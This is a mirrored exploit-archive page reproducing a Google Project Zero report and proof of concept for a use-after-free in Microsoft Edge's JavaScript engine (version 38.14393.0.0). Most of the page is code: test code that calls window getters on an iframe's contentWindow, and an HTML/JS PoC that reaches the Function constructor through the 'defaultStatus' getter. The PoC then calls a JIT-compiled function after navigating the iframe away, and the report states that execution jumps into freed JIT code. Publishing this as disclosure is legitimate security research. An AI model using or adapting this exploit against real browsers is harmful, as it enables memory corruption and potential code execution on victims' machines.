首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free
来源:Google Security Research 作者:Google 发布时间:2017-03-20  
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1043
 
I noticed that some javascript getters behave strangely.
 
My test code:
 
var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
 
var f = document.createElement("iframe");
 
f.onload = () => {
    f.onload = null;
 
    for (var x in window) {
        if (whitelist.indexOf(x) != -1)
            continue;
 
        try {
            window.__lookupGetter__(x).call(f.contentWindow);
            log(x);
        } catch (e) {
 
        }
    }
 
};
 
f.src = "https://abc.xyz/";
document.body.appendChild(f);
 
And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.
 
Tested on Microsoft Edge 38.14393.0.0.
-->
 
<!--
 
Microsoft Edge: Undefined behavior on some getters
 
I noticed that some javascript getters behave strangely.
 
My test code:
 
var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
 
var f = document.createElement("iframe");
 
f.onload = () => {
    f.onload = null;
 
    for (var x in window) {
        if (whitelist.indexOf(x) != -1)
            continue;
 
        try {
            window.__lookupGetter__(x).call(f.contentWindow);
            log(x);
        } catch (e) {
 
        }
    }
 
};
 
f.src = "https://abc.xyz/";
document.body.appendChild(f);
 
And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.
 
Tested on Microsoft Edge 38.14393.0.0.
 
-->
 
 
<pre id="d">
</pre>
<body></body>
 
<script>
 
function log(txt) {
    var c = document.createElement("div");
    c.innerText = "log: " + txt;
    d.appendChild(c);
}
 
function main() {
    var f = document.createElement("iframe");
    
    f.onload = () => {
        f.onload = () => {
            var status = window.__lookupGetter__("defaultStatus").call(f.contentWindow);
            var func_cons = status.constructor.constructor;
 
            var ff = func_cons("return 0x12345;");
            for (var i = 0; i < 0x100000; i++)
                ff();
 
            f.onload = () => {
                alert("get ready");
                ff();
            };
 
            f.src = "about:blank";
        };
 
        //a = f.contentWindow;
        f.src = "about:blank";
    };
 
    document.body.appendChild(f);
}
 
main();
 
</script>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wordpress Plugin Membership Si
·FTPShell Client 6.53 - 'Sessio
·Cerberus FTP Server 8.0.10.3 -
·FTPShell Server 6.56 - 'Change
·Windows DVD Maker 6.1.7 - XML
·ExtraPuTTY 0.29-RC2 - Denial o
·Microsoft Internet Information
·Mozilla Firefox - 'table' Use-
·Microsoft Edge Charkra Incorre
·Microsoft Internet Explorer -
·FTPShell Client 6.53 Buffer Ov
·D-Link DGS-1510 - Multiple Vul
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved